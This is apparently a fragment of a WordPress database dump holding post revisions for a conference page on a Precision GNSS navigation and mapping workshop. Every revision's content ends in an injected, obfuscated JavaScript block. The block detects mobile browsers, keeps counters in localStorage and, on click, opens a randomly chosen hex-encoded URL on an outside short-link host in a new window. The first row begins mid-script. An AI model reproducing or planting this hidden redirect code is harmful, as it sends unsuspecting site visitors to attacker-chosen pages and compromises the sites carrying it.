_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:10:29','2022-12-16 14:10:29','',3452,'https://gsw2023.com/?p=3481',0,'revision','',0),
(3482,1,'2022-12-16 14:10:48','2022-12-16 14:10:48','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:10:48','2022-12-16 14:10:48','',3452,'https://gsw2023.com/?p=3482',0,'revision','',0),
(3483,1,'2022-12-16 14:11:12','2022-12-16 14:11:12','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:11:12','2022-12-16 14:11:12','',3452,'https://gsw2023.com/?p=3483',0,'revision','',0),
